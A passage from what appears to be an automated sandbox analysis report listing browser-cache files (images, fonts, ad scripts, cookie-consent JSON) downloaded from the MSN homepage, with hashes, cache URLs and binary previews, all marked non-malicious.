File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	7723
Entropy (8bit):	7.800750263055433
Encrypted:	false
SSDEEP:	192:BYauzxMOZgQ77uY9O7dsoDgjzK/BAldpdrC:e/zxMOZdOSO7dsoAlXJC
MD5:	2DBE88211B6FD60C6D5C92B1C3744053
SHA1:	FB5A26B9BA5A8057841A163D525BC437C88F3BD5
SHA-256:	531BFCECD45E0C0FA5430A71884D8020AFFF2A2D388C67608FF895B97D7A1ECB
SHA-512:	75835F22817A34D6AD04E9A23B5CA2D7F9D321A78213426AC8A2D53D1B77EDB8BCD2B6DDD834A199CB2CFADD453982AC0AFF791C45870668937DB161FD74ADCD
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cZlCU.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...!QN.........}%...b...(...(...))i(..&.\..n.F.N....Q.S.h..iqKE..QE...Q@..PN).QH.2..*..Q...p....R..1E.S...(...(...(...(...(.h..@...P.E.P.E.P.E.P.IKE.&(.-...R.@.KE..QE..RQE..QE0..J(4.J....#tF..j.......5n..cQ...v.a.<(..^\|.9T.6.}.Z.lg1....].!E.S...(...(...(...(.h..@.QE..QE..QE..QE..QE..QE..QE..QE..QI@..QL..(...!.zu?JZ....B..N....O.%A]....K..8Z.....MMvvm....Ie.\...o.7..}.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1cZw6c[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 300x250, frames 3
Category:	downloaded
Size (bytes):	11578
Entropy (8bit):	7.939145426153418
Encrypted:	false
SSDEEP:	192:Bb54XMHggdDemqJ50u6F//kYjM5puH5Mukh11STNSGnnl+I8v4/N32WCQWeb:Z5W6HIH0u6F/RXH55811STNSGnsB4Hbb
MD5:	4919D766A74862D3E95616007E49B3A1
SHA1:	3F7CA98BF7967ACE0E131564C0EDBD151E231971
SHA-256:	B92AB930FDF33D6CAEC4084A164A76BE7799DCABB813EC977F3A2E061C58CECD
SHA-512:	34A23BAEF27F76C7FDA5C53467F40D588ECFF8DFD7A97DC142CA7ACCB60708186A14EE6CAE9244EC6A4662EA761EF1CAF979E58158DB24EB65CE3639B34A0C1E
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cZw6c.img?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......R.\.....h.+.vii...aXvj+..8..sI4.$....A.Bw7... ..KQ.;.}8.E.....[.'9..1c..D.....j\...8n.....(..p.@.{.&.:'....8.....gF.;..X..6....1.U{.s..($..QQ.vB.../N.......}j.R..."KCe...jX.e<...v(.4].`...L.d....A......s...q..?.gfn.n..RV&v.4RQ@X\.f.Jc..Rf.,..)(.a.i.....f..Jv.AE.....Q@....P....@:.JZB..L.@X.zs(.Uj.x>p}..t.b......I.p[ .P.Ua...<.......hr.;3.U.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBPfCZL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 50 x 50
Category:	downloaded
Size (bytes):	2313
Entropy (8bit):	7.594679301225926
Encrypted:	false
SSDEEP:	48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
MD5:	59DAB7927838DE6A39856EED1495701B
SHA1:	A80734C857BFF8FF159C1879A041C6EA2329A1FA
SHA-256:	544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
SHA-512:	7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,\|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../\|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..\|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(\|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....TP......>...L..!T.X!.(..@a..IsgM..\|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBX2afX[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	688
Entropy (8bit):	7.578207563914851
Encrypted:	false
SSDEEP:	12:6v/74//aaICzkSOms9aEx1Jt+9YKLg+b3OI21P7qO1uCqbyldNEiA67:BPObXRc6AjOI21Pf1dNCg
MD5:	09A4FCF1442AD182D5E707FEBC1A665F
SHA1:	34491D02888B36F88365639EE0458EDB0A4EC3AC
SHA-256:	BE265513903C278F9C6E1EB9E4158FA7837A2ABAC6A75ECBE9D16F918C12B536
SHA-512:	2A8FA8652CB92BBA624478662BC7462D4EA8500FA36FE5E77CBD50AC6BD0F635AA68988C0E646FEDC39428C19715DCD254E241EB18A184679C3A152030FD9FF8
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................U....sRGB.........gAMA......a.....pHYs..........o.d...EIDATHK.Mh.A......4.....b.Zoz....z.".....A../.X.../........"(.A.(.qPAK/......I.Yw3...M...z./...7..}o...~u'...K_...YM...5w1b....y.V.\|.-e.i..D...[V.J...C......R.QH.....:....U.....].$]LE3.}........r..#.]...MS.....S..#..t1...Y...g........ 8."m......Q..>,.?S..{.(7.....;..I.w...?MZ..>.......7z.=.@.q@.;.U..~....:.[.Z+3UL#.........G+3.=.V."D7...r/K.._..LxY.....E..$..{. sj.D...&.......{.rYU..~G....F3..E...{. ......S....A.Z.f<=.....'.1ve.2}[.....C....h&....r.O..c....u... .N_.S.Y.Q~.?..0.M.L..P.#...b..&..5.Z....r.Q.zM'<...+.X3..Tgf._...+SS...u........./.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBnYSFZ[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	560
Entropy (8bit):	7.425950711006173
Encrypted:	false
SSDEEP:	12:6v/78/+m8H/Ji+Vncvt7xBkVqZ5F8FFl4hzuegQZ+26gkalFUx:6H/xVA7BkQZL8OhzueD+ikalY
MD5:	CA188779452FF7790C6D312829EEE284
SHA1:	076DF7DE6D49A434BBCB5D88B88468255A739F53
SHA-256:	D30AB7B54AA074DE5E221FE11531FD7528D9EEEAA870A3551F36CB652821292F
SHA-512:	2CA81A25769BFB642A0BFAB8F473C034BFD122C4A44E5452D79EC9DC9E483869256500E266CE26302810690374BF36E838511C38F5A36A2BF71ACF5445AA2436
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.S.KbQ..zf.j...?@...........J.......z..EA3P....AH...Y..3......\|6.6}......{..n. ...b..........".h4b.z.&.p8`...:..Lc....u:......D...i$.)..pL.^..dB.T....#.f3...8.N.b1.B!.\...n..a...a.Z........J%.x<....\|..b.h4.`0.EQP.. v.q....f.9.H`8..\...j.N&...X,2...<.B.v[.(.NS6..\|>..n4...2.57........f.Q&.a-..v..z..{P.V......>k.J...ri..,.W.+.......5:.W.t...i.....g....\.t..8.w...:......0....%~...F.F.o".'rx...b..vp....b.l.Pa.W.r..aK..9&...>.5...`..'W......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20647
Entropy (8bit):	5.29809706323854
Encrypted:	false
SSDEEP:	384:P9AGm6ElzD7XzeMk/lg2f5vzBgF3OZOoQWwY4RXrqt:REJDnci2RmF3OsoQWwY4RXrqt
MD5:	F469156B30F21DBBE8753F150558C99B
SHA1:	399066F1A989B29D1089995284F0F137E2AFFD7B
SHA-256:	9236F0A1E3955530ACDA603B7D05323A1F6FC90C97845C435F64F0903D681D4B
SHA-512:	97387740076877139B7D4E9CF163F38012712968259F2E20ABD7190B1F1883F99DCDBBC402FCF9AB46C49655EDBBB0FBFAA52097F57774A2A2D6BB077698FDA1
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":73,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\fcmain[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	37144
Entropy (8bit):	5.097667293407909
Encrypted:	false
SSDEEP:	768:/1av44u3hPPgW94hYetSZ8sPYXf9wOBEZn3SQN3GFl295okly43/ilyPs5:NQ44uRwWmhY+SCsPYXf9wOBEZn3SQN3k
MD5:	F04BAAFECCED8459C695C2540B963313
SHA1:	F0D8E09EE0779036F9D5425E162DE896A74BEF11
SHA-256:	C8828BC63153607CDB41A8D4950CBF6E0D4B0BBE6A2B6CA903098CCE95FEB323
SHA-512:	DA106F99A18DFBD78451968FA3322C78CABCA9AC027F588EE47514E6F17AEA403C852BA8C5BECB9CE25C6281B604D35D3FED6D9338A0C55649D6ADD06463E378
Malicious:	false
IE Cache URL:	https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=858412214&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1611307346816346390&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
Preview:	;window._mNDetails.initAd({"vi":"1611307346816346390","s":{"_mNL2":{"size":"306x271","viComp":"1611305595417578754","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2886931942","l2ac":""},"_mNe":{"pid":"8PO8WH2OT","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=858412214#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"858412214\",\"1611307346816346390\")) \|\| (parent._mNDetails[\"locHash\"] && parent._mNDetails[\"locHash\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\http___cdn.taboola.com_libtrc_static_thumbnails_2b016d601242a511f3242b0d41867296[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	11334
Entropy (8bit):	7.944008421903137
Encrypted:	false
SSDEEP:	192:R77L+S92IDxF/8/ZMqHiKk0W0qoaAKsJEIc/1oblnY2L18mHcqFO/:R7lhFFE5Jffa1kEIc/SblnY2L18sNY
MD5:	EC7C7D8D9343599F00675611FF1016BC
SHA1:	AFC368B6286EC07997560ED0028F37C6D7ADB5EA
SHA-256:	E47A32315EAF311A394CED8B8B3E2C5AE2BDDF48DE9BF48475AF7C7D5BE7D0FE
SHA-512:	977B0497DF97F18FA3761F315A92801E862191CFA7BF2DF629CEE8EC612AA813B3AF73F50F0B2DFBA21EF23439BD8B8C3E15B752F3FB69D676810DE9B6ED4328
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F2b016d601242a511f3242b0d41867296.png
Preview:	......JFIF.....................................................................&""&0-0>>T.......................................................&""&0-0>>T......7...."..........6...............................................................................................................................\...O)..(....O.....}.O....O....O<..........)...C..aS.........U.\G.\..-.3'.....~...tN2.)J..c.u\|.Q...+C..U#.Q.....NSIS.Q..E.Z6Q..N..^..3....C.)".-.u........+.w".Y..zO._!...\..+.._1J....6.....q..7.jR.....%.'6Q...w.......!.n..1._...sY.o.........4.4..Z.L...3s8.'..O.r\.\|].Z.s.q6...mp_I.EOK..i*`.Cp..-..^M.......j...`..e.q...U;t.\1.{.....4.S....NKk.K...#.7/n\|.............m\.S.W24...6.....mn;^.jQ{.......B.i......Z.......3.w.&s..a.t.[...>.U.y..Fc-r.f...e.K.....}.e.h.{5..`<..R.8..OL....h......HU............".[.3.$=.W.[....y.Y..G.....[T.}m...r......HK..7..l..^.H...A0.....x5DI.....x.FR..=.Y#5q...r.}z...u....\x.R....H....~...}Ttu.r3#...\|...._(..ARk.....M-vm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\http___cdn.taboola.com_libtrc_static_thumbnails_b735c05319719836ca882359e4b7c3ba[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	6812
Entropy (8bit):	7.915235832193386
Encrypted:	false
SSDEEP:	192:Sg/d97pChtf6baMt2UF0j2rGzd45kINIQojc:SgV97sXmt0j2iZkQw
MD5:	3C1ED1D8219AF62F28C38BFED63C5EB4
SHA1:	B2827EBE6B551957335EFF94783CBF659EFCAEE1
SHA-256:	AD2B6DE133156564700A99D82F56D2009334DBA9A4B5FCB482C33DF462EB245B
SHA-512:	68F45D4FEF839F91CC04EBCB3E53E1708BC1597DD1D89ECBBC12CB3B4FAA2FA34A6D342FFAE8621005082682AE62F6A181AAABF7B32C4E77574826B5B926EC25
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fb735c05319719836ca882359e4b7c3ba.jpg
Preview:	......JFIF...........................................,. .. .,'/&$&/'F7117FQD@DQbXXb\|v\|................................,. .. .,'/&$&/'F7117FQD@DQbXXb\|v\|.........7...."..........4.................................................................8.......w<W`Uo...}?..1mP..a`......bx......K.R,)..~+Fu.OK..<..;.S....g.."$'\syx.h\....1g.0..f.R-.M\h."/.4l.g-a..{.WgC.o.9.g{........+`ja...fl.J...H.z3#C..k....=\[..[N......SiE-.:.4.......[3.!*..q..G!1}.?sq.g.,Wn.}..}...M.3..-..{.?t...rDI......4d.+..gQ.:2U.R)[S...X...BU.k...i.+fPc1Vh...8q.Wr.,....w......T...S....7..h(8Y"./.3I.>!8,..\N.C.l.Md...as[/jt.;........V.....\|L..%\|.m\.F..f....t.Fj.9.S....]..J>.;.....2....x.x....HA.l.......[Ub....W.IJ.B.\|..h(^G.O..q..$A.......l}.#2.1.....{6..}sF.....M.&b..-.}.tN./.M........;....K.x...fEg[....%.F..#..uJw..fDD.=.Z.O;.....5.?.?..."...Eq...x.n....u#e#.2..c.N.R${!jI..N..Y.J...;.....i.....wm.....#....J.LxG.%....(.r54.%^.qWLyuL.\.;.I?:......J....v.V..V4Ir.[..j.5Q.8...U..;.I.DV.c

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\otFlat[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	12588
Entropy (8bit):	5.376121346695897
Encrypted:	false
SSDEEP:	192:RtmLMzybpgtNs5YdGgDaRBYw6Q3gRUJ+q5iwJlLd+JmMqEb5mfPPenUpoQuQJ/Qq:RgI14jbK3e85csXf+oH6iAHyP1MJAk
MD5:	AF6480CC2AD894E536028F3FDB3633D7
SHA1:	EA42290413E2E9E0B2647284C4BC03742C9F9048
SHA-256:	CA4F7CE0B724E12425B84184E4F5B554F10F642EE7C4BE4D58468D8DED312183
SHA-512:	A970B401FE569BF10288E1BCDAA1AF163E827258ED0D7C60E25E2D095C6A5363ECAE37505316CF22716D02C180CB13995FA808000A5BD462252F872197F4CE9B
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/otFlat.json
Preview:	.. {.. "name": "otFlat",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCI+PGRpdiBjbGFzcz0ib3Qtc2RrLWNvbnRhaW5lciI+PGRpdiBjbGFzcz0ib3Qtc2RrLXJvdyI+PGRpdiBpZD0ib25ldHJ1c3QtZ3JvdXAtY29udGFpbmVyIiBjbGFzcz0ib3Qtc2RrLWVpZ2h0IG90LXNkay1jb2x1bW5zIj48ZGl2IGNsYXNzPSJiYW5uZXJfbG9nbyI+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtcG9saWN5Ij48aDMgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGhpcyBzaXRlIHVzZXMgY29va2llczwvaDM+PCEtLSBNb2JpbGUgQ2xvc2UgQnV0dG9uIC0tPjxkaXYgaWQ9Im9uZXRydXN0LWNsb3NlLWJ0bi1jb250YWluZXItbW9iaWxlIiBjbGFzcz0ib3QtaGlkZS1sYXJnZSI+PGJ1dHRvbiBjbGFzcz0ib25ldHJ1c3QtY2xvc2UtYnRuLWhhbmRsZXIgb25ldHJ1c3QtY2xvc2UtYnRuLXVpIGJhbm5lci1jbG9zZS1idXR0b24gb3QtbW9iaWxlIG90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIEJhbm5lciIgdGFiaW5kZXg9IjAiPjwvYnV0dG9uPjwvZGl2PjwhLS0gTW9iaWxlIENsb3NlIEJ1dHRvbiBFTkQtLT48cCBpZD0ib25ldHJ1c3QtcG9saWN5LXRleHQiPldlIHVzZSBjb29raWVzIHRvIGltcHJvdmUgeW91ciBleHBlcmllbmNlLCB0byByZW1lbWJlciBsb2ctaW4gZGV0YWlscywgcHJvdmlkZSBzZWN1cmUgbG9

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\otPcCenter[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	46394
Entropy (8bit):	5.58113620851811
Encrypted:	false
SSDEEP:	384:oj+X+jzgBCL2RAAaRKXWSU8zVrX0eQna41wFpWge0bRApQZInjatWLGuD3eWrwAs:4zgEFAJXWeNeIpW4lzZInuWjlHoQthI
MD5:	145CAF593D1A355E3ECD5450B51B1527
SHA1:	18F98698FC79BA278C4853D0DF2AEE80F61E15A2
SHA-256:	0914915E9870A4ED422DB68057A450DF6923A0FA824B1BE11ACA75C99C2DA9C2
SHA-512:	D02D8D4F9C894ADAB8A0B476D223653F69273B6A8B0476980CD567B7D7C217495401326B14FCBE632DA67C0CB897C158AFCB7125179728A6B679B5F81CADEB59
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/otPcCenter.json
Preview:	.. {.. "name": "otPcCenter",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY0NlbnRlciBvdC1oaWRlIG90LWZhZGUtaW4iIGFyaWEtbW9kYWw9InRydWUiIHJvbGU9ImRpYWxvZyIgYXJpYS1sYWJlbGxlZGJ5PSJvdC1wYy10aXRsZSI+PCEtLSBDbG9zZSBCdXR0b24gLS0+PGRpdiBjbGFzcz0ib3QtcGMtaGVhZGVyIj48IS0tIExvZ28gVGFnIC0tPjxkaXYgY2xhc3M9Im90LXBjLWxvZ28iIHJvbGU9ImltZyIgYXJpYS1sYWJlbD0iQ29tcGFueSBMb2dvIj48L2Rpdj48YnV0dG9uIGlkPSJjbG9zZS1wYy1idG4taGFuZGxlciIgY2xhc3M9Im90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIj48L2J1dHRvbj48L2Rpdj48IS0tIENsb3NlIEJ1dHRvbiAtLT48ZGl2IGlkPSJvdC1wYy1jb250ZW50IiBjbGFzcz0ib3QtcGMtc2Nyb2xsYmFyIj48aDMgaWQ9Im90LXBjLXRpdGxlIj5Zb3VyIFByaXZhY3k8L2gzPjxkaXYgaWQ9Im90LXBjLWRlc2MiPjwvZGl2PjxidXR0b24gaWQ9ImFjY2VwdC1yZWNvbW1lbmRlZC1idG4taGFuZGxlciI+QWxsb3cgYWxsPC9idXR0b24+PHNlY3Rpb24gY2xhc3M9Im90LXNkay1yb3cgb3QtY2F0LWdycCI+PGgzIGlkPSJvdC1jYXRlZ29yeS10aXRsZSI+TWFuYWdlIENvb2tpZSBQcmVmZXJlbmNlczwvaDM+PGRpdiBjbGFzcz0ib3QtcGxpLWhkciI+PHNwYW4gY2xhc3M9Im90LWxpLXRpdGxlIj5Db25zZW50PC9

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\4996b9[1].woff Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Web Open Font Format, TrueType, length 45633, version 1.0
Category:	downloaded
Size (bytes):	45633
Entropy (8bit):	6.523183274214988
Encrypted:	false
SSDEEP:	768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
MD5:	A92232F513DC07C229DDFA3DE4979FBA
SHA1:	EB6E465AE947709D5215269076F99766B53AE3D1
SHA-256:	F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
SHA-512:	32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Preview:	wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... ............I.A_.<........... ........d........................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAzb5EX[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	371
Entropy (8bit):	6.987382361676928
Encrypted:	false
SSDEEP:	6:6v/lhPkR/ikU2KG4Lph60GGHyY6Gkcz6SpBUSrwJuv84ipEuPJT+p:6v/78/Y2K7m0GGSXEBUQZkRbPBs
MD5:	13B47B2824B7DE9DC67FD36A22E92BBE
SHA1:	5118862BA67A32F8F9E2723408CF5FAF59A3282C
SHA-256:	9DB94F939C16B001228CA30AF19C108F05C4F1A9306ECC351810B18C57F271D4
SHA-512:	001A4A6E1B08B32C713D7878E00E37BF061DCFC34127885FB300478E929BC7A8FF59D426FE05183C0DDA605E8EF09C4E4769A038787838CC8A724B3233145C6D
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzb5EX.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...#...#.x.?v....IDAT8O.1N.A.E.x....J...!..J.....Ctp....;."..HI...@...xa.Q...W...o..'.o{.....\.Y.l...........O..7.;H....*..pR..3.x6.........lb3!..J8/.e....F...&.x..O2.;..$b../.H}AO..<)....p$...eoa<l9,3.a....D..?..F..H...eh......[........ja.i.!.........Z.V....R.A..Z..x.s....`...n..E......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB10MkbM[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	965
Entropy (8bit):	7.720280784612809
Encrypted:	false
SSDEEP:	24:T2PqcKHsgioKpXR3TnVUvPkKWsvIos6z8XYy8xcvn1a:5PZK335UXkJsgIyScf1a
